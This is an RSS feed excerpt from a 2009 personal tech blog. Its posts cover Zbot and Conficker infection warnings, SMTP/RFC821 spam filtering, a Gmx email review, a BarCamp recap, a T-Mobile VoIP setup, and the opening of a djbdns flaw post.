%System%\sdra64.exe and the hidden files %System%\lowsec\local.ds and %System%\lowsec\user.ds in combination with a hidden directory %System%\lowsec.  There were new memory pages created in the address space of the system process(es): services.exe, lsass.exe, alg.exe, iexplore.exe and svchost.exe.</span></p><p><span style="background-color: #ffffff;"><br /> </span></p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/10/zbot-variants-spreading.html">Zbot Variants Spreading!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/02/happy-valentines-day-enjoy-your-virus.html" title="Happy Valentine&#8217;s Day &#8211; Enjoy your Virus!">Happy Valentine&#8217;s Day &#8211; Enjoy your Virus!</a> (0)</li><li><a href="http://www.zerosource.org/2009/01/conflicker-downup-downadup-kido-spreading-removal-virus-alert.html" title="Conflicker, Downup, Downadup, Kido Spreading &#8211; Removal &#8211; Virus Alert!">Conflicker, Downup, Downadup, Kido Spreading &#8211; Removal &#8211; Virus Alert!</a> (6)</li><li><a href="http://www.zerosource.org/2010/07/mailerdaemon-postmaster-friend.html" title="Mailer-Daemon and Postmaster are NOT your Friend">Mailer-Daemon and Postmaster are NOT your Friend</a> (0)</li><li><a href="http://www.zerosource.org/2009/11/holiday-time-approaches.html" title="Holiday time approaches!">Holiday time approaches!</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/10/zbot-variants-spreading.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Can&#8217;t touch this!</title><link>http://www.zerosource.org/2009/08/cant-touch-this.html</link> <comments>http://www.zerosource.org/2009/08/cant-touch-this.html#comments</comments> <pubDate>Sun, 09 Aug 2009 07:31:06 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=998</guid> <description><![CDATA[Just wanted to give you a little something&#8230; This is Post from: ZeroSource!Can&#8217;t touch this! Its related:No Related Post<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/08/cant-touch-this.html">Can&#8217;t touch this!</a></p> ]]></description> <content:encoded><![CDATA[<p>Just wanted to give you a little something&#8230;</p><p><object width="500" height="405"><param name="movie" value="http://www.youtube.com/v/kbjrUOSss_o&#038;hl=en&#038;fs=1&#038;border=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/kbjrUOSss_o&#038;hl=en&#038;fs=1&#038;border=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="500" height="405"></embed></object></p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/08/cant-touch-this.html">Can&#8217;t touch this!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/08/cant-touch-this.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>A new Email Service &#8211; Not So Fast!</title><link>http://www.zerosource.org/2009/07/a-new-email-service-not-so-fast.html</link> <comments>http://www.zerosource.org/2009/07/a-new-email-service-not-so-fast.html#comments</comments> <pubDate>Thu, 30 Jul 2009 04:22:45 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Commentary]]></category> <category><![CDATA[Nerdology]]></category> <category><![CDATA[email]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=990</guid> <description><![CDATA[There is a new Email Service in town it is called Gmx.  Sign up is free, they claim 11 million people signed up already. So what do they offer? Mail Collector.   This is a way to check and or get your other mail ie hotmail, gmail, yahoo mail all in one place. Well I [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/07/a-new-email-service-not-so-fast.html">A new Email Service &#8211; Not So Fast!</a></p> ]]></description> <content:encoded><![CDATA[<p><a target="_blank" href="http://www.gmx.com" rel="nofollow" ><img class="alignleft size-full wp-image-991" style="margin: 3px;" title="logoGmx" src="http://static.zerosource.org/wp-content/uploads/2009/07/logoGmx.png" alt="logoGmx A new Email Service   Not So Fast!" width="122" height="68" /></a>There is a new Email Service in town it is called <a target="_blank" href="http://www.gmx.com" rel="nofollow" title="Gmx - Free E-Mail"  target="_blank">Gmx</a>.  Sign up is free, they claim 11 million people signed up already.</p><p><span id="more-990"></span></p><h3>So what do they offer?</h3><p>Mail Collector.   This is a way to check and or get your other mail ie <a target="_blank" href="http://www.hotmail.com" rel="nofollow" title="HotMail"  target="_blank">hotmail</a>, <a target="_blank" href="http://mail.google.com" rel="nofollow" title="Gmail"  target="_blank">gmail</a>, <a target="_blank" href="http://mail.yahoo.com" rel="nofollow" title="Yahoo!"  target="_blank">yahoo</a> mail all in one place.</p><p>Well I wouldn&#8217;t know see, when I went to it originally I was using Chrome the newest version of Chrome even.  This is what I ran into:</p><p><a href="http://static.zerosource.org/wp-content/uploads/gmxfail.JPG" rel="lightbox[990]"><img class="alignleft size-medium wp-image-992" style="margin: 3px;" title="gmxfail" src="http://static.zerosource.org/wp-content/uploads/2009/07/gmxfail-300x217.jpg" alt="gmxfail 300x217 A new Email Service   Not So Fast!" width="300" height="217" /></a> See they do not support chrome.  So I opened up IE 8 and was able to sign up.  This went pretty well.  The interface looks nice. It was easy to navigate.  The main login looks almost like a iGoogle page with widgets.   There are some good widgets, one for facebook, one for twitter.  Setting these up was easy and the login was fast.  The widget for twitter is Betwittered I believe.  I tried to setup my Gmail with the mail collector and it failed, wouldn&#8217;t connect to gmail.  So then I tried to setup my yahoo email and guess what, fail again.  So my next thing to try now that I have a username and password was to sign in with Chrome since it is my main browser of choice.   Fail again, username and password hit login and just sit.  At this time I have given up and try to close out IE 8 and it just hung.  Ended up having to cntrl + alt + del kill it.</p><h3>Final Thoughts</h3><p>So what does this say&#8230; lots of good ideas but maybe like Google did they should stick a Beta label on it.  I will give it a try again in a few months, see if they have any bugs out of it.  I&#8217;m always interested in new things.  Have you tried it? What did you think? Any issues with it for you?</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/07/a-new-email-service-not-so-fast.html">A new Email Service &#8211; Not So Fast!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html" title="Is it so bad to be E-mail Nazi!">Is it so bad to be E-mail Nazi!</a> (0)</li><li><a href="http://www.zerosource.org/2008/12/reason-not-to-send-e-cards.html" title="Reasons NOT to send E-Cards">Reasons NOT to send E-Cards</a> (0)</li><li><a href="http://www.zerosource.org/2008/08/msnbccom-breaking-news-virus.html" title="msnbc.com – BREAKING NEWS: VIRUS Alert">msnbc.com – BREAKING NEWS: VIRUS Alert</a> (0)</li><li><a href="http://www.zerosource.org/2008/08/why-do-people-send-spam.html" title="Why do people send spam?">Why do people send spam?</a> (2)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/07/a-new-email-service-not-so-fast.html/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>BarCampBirmingham v3.0 Wrap Up!</title><link>http://www.zerosource.org/2009/05/barcampbirmingham-v30-wrap-up.html</link> <comments>http://www.zerosource.org/2009/05/barcampbirmingham-v30-wrap-up.html#comments</comments> <pubDate>Tue, 05 May 2009 05:42:58 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Alabama]]></category> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Birmingham]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=909</guid> <description><![CDATA[So BarCampBirmingham v3 in the books, this was my first. I&#8217;m no longer a BarCamp Virgin! I was actually surprised by the turn out, I figured around 75 to 100 people easy. I noticed allot of talent throughout the sessions, and it was nice to get others take on topics from Python and Ruby to [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/05/barcampbirmingham-v30-wrap-up.html">BarCampBirmingham v3.0 Wrap Up!</a></p> ]]></description> <content:encoded><![CDATA[<p><a target="_blank" href="http://barcampbirmingham.com" rel="nofollow" ><img class="alignleft size-medium wp-image-901" style="margin: 3px;" title="barcamplogo" src="http://static.zerosource.org/wp-content/uploads/2009/05/barcamplogo-300x74.gif" alt="barcamplogo 300x74 BarCampBirmingham v3.0 Wrap Up!" width="210" height="52" /></a>So BarCampBirmingham v3 in the books, this was my first. I&#8217;m no longer a BarCamp Virgin!  I was actually surprised by the turn out, I figured around 75 to 100 people easy.  I noticed allot of talent throughout the sessions, and it was nice to get others take on topics from Python and Ruby to Iphone or Blackberry.   I must say tho, the Mac Cult was in full force.</p><p><span id="more-909"></span></p><p>One of the best parts was not from the scheduled sessions.  It was the sessions in the halls that I found the most interesting.   How several very opinionated individuals can get together and discuss everything from the type of music someone listens to, to local Birmingham Politics.</p><p>It was good seeing <a target="_blank" href="http://twitter.com/scottkitchens" rel="nofollow" title="@scottkitchens"  target="_blank">old friends</a>, meeting <a target="_blank" href="http://www.evantravers.com/" rel="nofollow" title="@evantravers"  target="_self">new ones</a>, and hanging with <a target="_blank" href="http://anutterwasteoftime.com/" rel="nofollow" title="@shadowhelm"  target="_self">current one</a>.  It was also great meeting our nerd brethern from <a target="_blank" href="http://www.studionashvegas.com/" rel="nofollow" title="@studionashvegas"  target="_blank">Nashville, Hey Mitch</a>.  I took another listen to a radio station I ditched,  <a target="_blank" href="http://www.live1005online.com/" rel="nofollow" title="Live 100.5"  target="_blank">Live 100.5</a> thanks <a target="_blank" href="http://urbanfabric.wordpress.com/" rel="nofollow" title="@ufmusic"  target="_self">Ken</a>.</p><p>I&#8217;m looking forward to the next BarCamp and think we could easy handle two a year in Birmingham.   Up next, WordCamp!</p><div class="wp-caption alignnone" style="width: 510px"><a target="_blank" href="http://www.flickr.com/photos/mattsheets/3502066151/" rel="nofollow" title="BarCampBirmingham 3 by matt.sheets, on Flickr" ><img title="Bar Camp Wrapup" src="http://static.zerosource.org/wp-content/uploads/2009/05/3502066151_8bace67ae0.jpg" alt="BarCampBirmingham 3" width="500" height="332" /></a><p class="wp-caption-text">Photo by and © by Matt Sheets http://mattsheets.com/</p></div><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/05/barcampbirmingham-v30-wrap-up.html">BarCampBirmingham v3.0 Wrap Up!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2010/02/live-100-5-going-silent.html" title="Live 100.5 Going Silent">Live 100.5 Going Silent</a> (2)</li><li><a href="http://www.zerosource.org/2009/06/city-stages-2009.html" title="City Stages 2009">City Stages 2009</a> (0)</li><li><a href="http://www.zerosource.org/2009/04/barcamp-birmingham-may-2nd.html" title="BarCamp Birmingham May 2nd">BarCamp Birmingham May 2nd</a> (1)</li><li><a href="http://www.zerosource.org/2008/08/update-to-zerosource-bhampulse.html" title="Update to Zerosource, Bhampulse!">Update to Zerosource, Bhampulse!</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/05/barcampbirmingham-v30-wrap-up.html/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Is it so bad to be E-mail Nazi!</title><link>http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html</link> <comments>http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html#comments</comments> <pubDate>Thu, 30 Apr 2009 04:21:50 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[email]]></category> <category><![CDATA[servers]]></category> <category><![CDATA[Work]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=904</guid> <description><![CDATA[First so I don&#8217;t offend anyone, I&#8217;m not useing the word Nazi in a bad sense, only like Seinfield in the Soup Nazi episode.  We have began actually following RFC821. So what is an RFC?  Well it is a Request for Comments.  It is the standards that defines the Internet and how it operates.  It [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html">Is it so bad to be E-mail Nazi!</a></p> ]]></description> <content:encoded><![CDATA[<p>First so I don&#8217;t offend anyone, I&#8217;m not useing the word Nazi in a bad sense, only like Seinfield in the <a target="_blank" href="http://en.wikipedia.org/wiki/Soup_Nazi" rel="nofollow" title="Soup Nazi"  target="_blank">Soup Nazi</a> episode.   We have began actually following <a target="_blank" href="http://www.faqs.org/rfcs/rfc821.html" rel="nofollow" title="RFC 821"  target="_blank">RFC821</a>.</p><p>So what is an RFC?  Well it is a Request for Comments.  It is the standards that defines the Internet and how it operates.  It also refers to the way RFC documents are discussed and approved by the Internet community.</p><p><span id="more-904"></span></p><p>RFC821 describes the way e-mail servers talk to each other.  So lets go over a standard email discussion between two servers.  We will call them mail.serverA.net and mail.serverB.com.  A is going to connect to B and send an email to UserB from UserA.  This starts when mail.serverA.net connects to mail.serverB.com on port 25.  ServerA has ip 1.1.1.1 and ServerB 2.2.2.2</p><p>ServerB: <code>220 mail.serverB.com</code></p><p>ServerA:  helo mail.serverA.net</p><p>ServerB: <code>250 mail.serverB.com Hello mail.serverA.net [1.1.1.1], pleased to meet you</code></p><p><code>ServerA: MAIL FROM: UserA@serverA.net</code></p><p><code>ServerB: 250 2.1.0 UserA@serverA.net... Sender ok</code></p><p><code>ServerA: RCPT TO: UserB@serverB.com</code></p><p>ServerB:  <code>250 2.1.0 UserB@serverB.com... Recipient ok</code></p><p>ServerA:  <code>DATA</code></p><p>etc&#8230;</p><p>So exactly how did we start following the standards?  Rules!</p><p>First we require that the server you connect to ours from has a correct DNS entry.  DNS is the Domain Name Service, it is the service that turns mail.serverA.net to 1.1.1.1.  So if our mail server gets an email from mail.serverA.net we do a DNS/Nslookup on the mail server and see that it returns 1.1.1.1 but wait then we check to see that 1.1.1.1 returns to mail.serverA.net as a standard all mail servers that send email should have their dns forward and reverse.</p><p>Second we require the server to identify itself per standard.  Helo FQDN (Fully Qualified Domain Name).  This is part of the RFC821.  So serverA would say<br /> helo mail.serverA.net</p><p>Third per RFC we require the mail <em>from:</em> and <em>rcpt to:</em> to follow RFC period.<br /> mail from: &lt;user@host&gt;</p><p>Last not following the RFC or anything else, but we are stopping users from emailing themselves.  Something that spammers have taken up doing.  Not emailing themselves, although that would be funny.  They have started sending email as the user, so the to and from are the same.  I know we can block email if it is not from an internal ip etc&#8230;.  That does not work as our users are located on many different networks, at many different locations.</p><p>So how has this done?  Well we have had people calling that can&#8217;t email to someone.  We explain why and tell them how to fix it.  Users have called &#8220;I don&#8217;t think mail is working, I haven&#8217;t got any spam!&#8221;.  Oh yea and the hoss mail server has gone from 80 to 90% processor usage to less then 15% at peak.  We have also blocked 300,000 on one server in 24 hours.</p><p>Finally if you are a mail administrator, please quit just going with it!  Please quit going, well its broke but it still works no one is complaining.  <strong>Fix Your Server!</strong></p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html">Is it so bad to be E-mail Nazi!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2008/12/reason-not-to-send-e-cards.html" title="Reasons NOT to send E-Cards">Reasons NOT to send E-Cards</a> (0)</li><li><a href="http://www.zerosource.org/2008/05/stop-the-backscatter-er-joe-jobs.html" title="Stop the Backscatter, er Joe Jobs!">Stop the Backscatter, er Joe Jobs!</a> (0)</li><li><a href="http://www.zerosource.org/2008/04/clamav-update-and-fix.html" title="ClamAV Update and Fix">ClamAV Update and Fix</a> (0)</li><li><a href="http://www.zerosource.org/2008/04/exe-in-url-and-earth-day-ends.html" title=".exe in url and Earth day ends!">.exe in url and Earth day ends!</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Conflicker is not Y2K Bug!</title><link>http://www.zerosource.org/2009/04/conflicker-downdup-is-not-y2k.html</link> <comments>http://www.zerosource.org/2009/04/conflicker-downdup-is-not-y2k.html#comments</comments> <pubDate>Fri, 17 Apr 2009 06:54:39 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[conflicker]]></category> <category><![CDATA[virus]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=880</guid> <description><![CDATA[I&#8217;ve had quite a few people tell me, well it didn&#8217;t do anything?  The media blew it all out of proporation, after all isn&#8217;t that the media&#8217;s job? Estimated up to 12 Million Infected Machines World Wide! (Trend Micro) Well it wasn&#8217;t blown out of proportion.  The conflicker worm has already infected well over a [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/04/conflicker-downdup-is-not-y2k.html">Conflicker is not Y2K Bug!</a></p> ]]></description> <content:encoded><![CDATA[<p>I&#8217;ve had quite a few people tell me, well it didn&#8217;t do anything?  The media blew it all out of proporation, after all isn&#8217;t that the media&#8217;s job?</p><h2>Estimated up to 12 Million Infected Machines World Wide! (Trend Micro)</h2><p><span id="more-880"></span></p><p>Well it wasn&#8217;t blown out of proportion.  The conflicker worm has already infected well over a million computers world wide.   Some have it upwards 10 million computers.   I don&#8217;t think it was blown out of proportion, if anything I believe it has opened a few eyes.  Have you made sure your updated on all your software?</p><h2>PATCH PATCH PATCH</h2><p>If you run a windows operating system, you <strong>MUST</strong> keep your machine updated at all times.  This is not a suggestion, this is not an idea, this is a fact. If you do not, you will be infected if not by the conflicker worm, by something.  Can you believe there are companies that are still running windows NT and Windows 95!</p><blockquote><p><em>A Microsoft executive calls the ease with which two British e-crime specialists managed to hack into a Windows XP computer as both &#8220;enlightening and frightening.&#8221;</em></p></blockquote><h2>Conflicker&#8230; is this the new Storm Worm?</h2><p>So now we just sit back and wait to see what it is going to do?  Some say it has began hijacking PC&#8217;s asking the user to pay $50 to get a fix.  Using popups to fool the user into thinking it is a valid anti virus program.  Others have said it has started to send spam, I can&#8217;t confirm either.  Only time will tell&#8230;</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/04/conflicker-downdup-is-not-y2k.html">Conflicker is not Y2K Bug!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/11/holiday-time-approaches.html" title="Holiday time approaches!">Holiday time approaches!</a> (0)</li><li><a href="http://www.zerosource.org/2009/10/zbot-variants-spreading.html" title="Zbot Variants Spreading!">Zbot Variants Spreading!</a> (0)</li><li><a href="http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html" title="April Fools, You&#8217;re Infected.. No Really.. Seriousl">April Fools, You&#8217;re Infected.. No Really.. Seriousl</a> (3)</li><li><a href="http://www.zerosource.org/2009/02/conflicker-downup-downadup-microsoft-offers-250000-reward.html" title="Conflicker, Downup, Downadup Microsoft Offers $250,000 reward!">Conflicker, Downup, Downadup Microsoft Offers $250,000 reward!</a> (1)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/04/conflicker-downdup-is-not-y2k.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>April Fools, You&#8217;re Infected.. No Really.. Seriousl</title><link>http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html</link> <comments>http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html#comments</comments> <pubDate>Wed, 01 Apr 2009 04:19:34 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[virus]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=866</guid> <description><![CDATA[Tomorrow April 1st 2009, April Fools Day security specialist everywhere are on the look out for the Conflicker worm to spread.  I have detailed before how it spreads and  you can read that here &#8220;Conflicker, Downup, Downadup, Kido&#8221; and the fact that Microsoft has gone an offered $250,000 reward. So lets start checking if your [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html">April Fools, You&#8217;re Infected.. No Really.. Seriousl</a></p> ]]></description> <content:encoded><![CDATA[<p><img class="alignleft" style="margin: 2px;" title="6 in six seconds" onclick="insert_image('http://www.flickr.com/photos/95565118@N00/922632392', 'http://farm2.static.flickr.com/1311/922632392_376b28c1f5', '6 in six seconds');" src="http://static.zerosource.org/wp-content/uploads/2009/03/922632392_376b28c1f5_s.jpg" alt="922632392 376b28c1f5 s April Fools, Youre Infected.. No Really.. Seriousl" hspace="2" vspace="2" width="68" height="68" />Tomorrow April 1st 2009, April Fools Day security specialist everywhere are on the look out for the Conflicker worm to spread.  I have detailed before how it spreads and  you can read that here &#8220;<a href="http://www.zerosource.org/2009/01/conflicker-downup-downadup-kido-spreading-removal-virus-alert.html" target="_self">Conflicker, Downup, Downadup, Kido</a>&#8221; and the fact that <a href="http://www.zerosource.org/2009/02/conflicker-downup-downadup-microsoft-offers-250000-reward.html" target="_blank">Microsoft has gone an offered $250,000 reward</a>.</p><p><span id="more-866"></span></p><p>So lets start checking if your infected yet:</p><p><strong>Can you get to the following websites:</strong></p><ol><li><a target="_blank" href="http://mcafee.com/" rel="nofollow"  target="_blank">http://mcafee.com/</a></li><li><a target="_blank" href="http://www.symantec.com/" rel="nofollow"  target="_blank">http://www.symantec.com/</a></li><li><a target="_blank" href="http://www.symantec.com/norton/index.jsp" rel="nofollow"  target="_blank">http://www.symantec.com/norton/index.jsp</a></li></ol><p>If you can <strong>NOT</strong> reach the following websites, you may be infected.</p><p>Can you run windows update and connect to windows update website?</p><p>If you can&#8217;t, and you can not reach the above websites you&#8217;re probably infected.   There are many ways and different products to get rid of it.  I&#8217;m not going to tell you what to use.  I&#8217;ll tell you the same thing I&#8217;d tell a client. You should reformat and reinstall.  That is the only 100% way of getting rid of it.  Never Trust a system with any personal or business data that has been infected or compromised by someone or something else.</p><p>So now lets say you&#8217;re not infected yet&#8230; what do you do?  Well first thing is to update your computer.  Make sure you have all the updates from Microsoft. Do not use some free tool, or some other website to download the updates.  So far the worm spreads by exploiting security vulnerabilities that there are patches for, and you should already be running.</p><h2>NOTE If your infected with Conflicker:</h2><p>If you are infected Microsoft has put together a page themselves that explains what versions are out and what you can do to remove it.  I still say you should reformat and reinstall.</p><p><a target="_blank" href="http://www.microsoft.com/protect/computer/viruses/worms/conficker.mspx" rel="nofollow"  target="_blank">Computer Worms &#8211; Conflicker</a></p><p>Edited after being caught using bad grammer and use of your and you&#8217;re by the grammer police!</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html">April Fools, You&#8217;re Infected.. No Really.. Seriousl</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/02/conflicker-downup-downadup-microsoft-offers-250000-reward.html" title="Conflicker, Downup, Downadup Microsoft Offers $250,000 reward!">Conflicker, Downup, Downadup Microsoft Offers $250,000 reward!</a> (1)</li><li><a href="http://www.zerosource.org/2009/01/conflicker-downup-downadup-kido-spreading-removal-virus-alert.html" title="Conflicker, Downup, Downadup, Kido Spreading &#8211; Removal &#8211; Virus Alert!">Conflicker, Downup, Downadup, Kido Spreading &#8211; Removal &#8211; Virus Alert!</a> (6)</li><li><a href="http://www.zerosource.org/2010/02/operation-aurora-continues.html" title="Operation Aurora &#8211; Continues">Operation Aurora &#8211; Continues</a> (0)</li><li><a href="http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html" title="Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer">Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Going Skype Fail, Going T-Mobile @Home Success!</title><link>http://www.zerosource.org/2009/03/going-skype-fail-going-t-mobile-home-success.html</link> <comments>http://www.zerosource.org/2009/03/going-skype-fail-going-t-mobile-home-success.html#comments</comments> <pubDate>Thu, 26 Mar 2009 02:49:58 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Skype]]></category> <category><![CDATA[TMOBILE]]></category> <category><![CDATA[VoIP]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=859</guid> <description><![CDATA[So originaly I was going to go full on Skype to save some money.  You can read &#8220;Going full SKYPE at Home Part 1&#8221; for more information on that.  Well I found out that T-Mobile my cell phone provider offers an Voip service also.  It only cost $10 a month on my plan and that [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/going-skype-fail-going-t-mobile-home-success.html">Going Skype Fail, Going T-Mobile @Home Success!</a></p> ]]></description> <content:encoded><![CDATA[<p><a href="http://static.zerosource.org/wp-content/uploads/2009/03/t_mobile_logo.jpg" rel="lightbox[859]"><img class="alignleft size-full wp-image-860" style="margin: 3px;" title="t_mobile_logo" src="http://static.zerosource.org/wp-content/uploads/2009/03/t_mobile_logo.jpg" alt="t mobile logo Going Skype Fail, Going T Mobile @Home Success!" width="192" height="57" /></a>So originaly I was going to go full on Skype to save some money.  You can read &#8220;<a href="http://www.zerosource.org/2009/01/going-full-skype-at-home-part-1.html"title="Going full SKYPE at Home Part 1"  target="_self">Going full SKYPE at Home Part 1</a>&#8221; for more information on that.  Well I found out that T-Mobile my cell phone provider offers an Voip service also.  It only cost $10 a month on my plan and that is for unlimited calls local and long distance.</p><p><span id="more-859"></span>This service is costing $10 a month that is $120 a year.  I also had to purchase the HiPort Adapter.  It cost me $39.99 so I&#8217;m down to $159.99 for the year.  I could have got the Linksys Router but I already have a router, don&#8217;t need two of them.  The adapter plugs directly into my router via an ethernet connection.  <a href="http://static.zerosource.org/wp-content/uploads/2009/03/hiport.jpg" rel="lightbox[859]"><img class="alignright size-full wp-image-861" title="hiport adapter" src="http://static.zerosource.org/wp-content/uploads/2009/03/hiport.jpg" alt="hiport adapter" width="250" height="270" /></a>Its default address is 192.168.2. something. You can access it via a web browser.  The default username is blank and password is Admin.  Once you login you can configure this.</p><p>I first turned it on dhcp, turned off dhcp server on the device since I&#8217;m not going to be plugging anything into it.  I also turned off all services it had enabled.  So all it does is phone.  Oh yea did I mention you have to put a SIM card into this thing.</p><p>Next on my trusty old WRT54G, I am of course running <a target="_blank" href="http://www.polarcloud.com/tomato" rel="nofollow" title="Tomato Firmware"  target="_blank">Tomato Firmware</a>.  I gave the HiPort device a Static DHCP address.</p><p>I then setup QOS &#8220;Quality of Service&#8221;.  Now it doesn&#8217;t matter the speed coming in, I can&#8217;t control how fast I&#8217;m recieving data.  What I&#8217;m setting QOS for is the speed going out.  So I figure up my outgoing speed, set that in QOS.  I then set the Mac Address of the HiPort as Highest Priority.  I have Prioritize small packets with these control flags ACK.  Default Class is Low.  Max bandwidth (Outbound) figure up max kbit/s.  Then I set Highest at %90-%100, High at %85-%95, Medium %60-80, Low %45-65, and Lowest %40-%50.  Then on Classifications I set the HiPort Mac Address for incoming/outgoing to Highest.  I set DNS port 53 0-2kb Highest (normal DNS queries).  I also have Web Ports 80/443 at High 0-512kb, and large dns and webports at medium both +2 and +512 kb.  I can go into more detail on QoS but what it ends up doing is making sure that my phone call gets highest priority going out.</p><p>So far no problems at all, the call quality is great.   Total Cost first year $159.99 saving me $600.00 a year on phone service.   Oh yea forgot to mention I have E911 and got to port my number.  Something Skype was not going to allow me to do.</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/going-skype-fail-going-t-mobile-home-success.html">Going Skype Fail, Going T-Mobile @Home Success!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/01/going-full-skype-at-home-part-1.html" title="Going full SKYPE at Home Part 1">Going full SKYPE at Home Part 1</a> (4)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/03/going-skype-fail-going-t-mobile-home-success.html/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Flaw in djbdns 1.05 &#8211; Hell Has Frozen Over!</title><link>http://www.zerosource.org/2009/03/flaw-in-djbdns-105-hell-has-frozen-over.html</link> <comments>http://www.zerosource.org/2009/03/flaw-in-djbdns-105-hell-has-frozen-over.html#comments</comments> <pubDate>Sat, 07 Mar 2009 03:55:55 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[djb]]></category> <category><![CDATA[djbdns]]></category> <category><![CDATA[qmail]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=854</guid> <description><![CDATA[A decade later Dr. Bernstein acknowledges a security flaw in one of his software packages, djbdns.   He has always offered to pay $1000 to anyone that found a security flaw in something he has offered from Qmail, ucspi-tcp, daemontools, and djbdns.  It took a decade for someone to find it, and unlike most software providers [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/flaw-in-djbdns-105-hell-has-frozen-over.html">Flaw in djbdns 1.05 &#8211; Hell Has Frozen Over!</a></p> ]]></description> <content:encoded><![CDATA[<p>A decade later <a target="_blank" 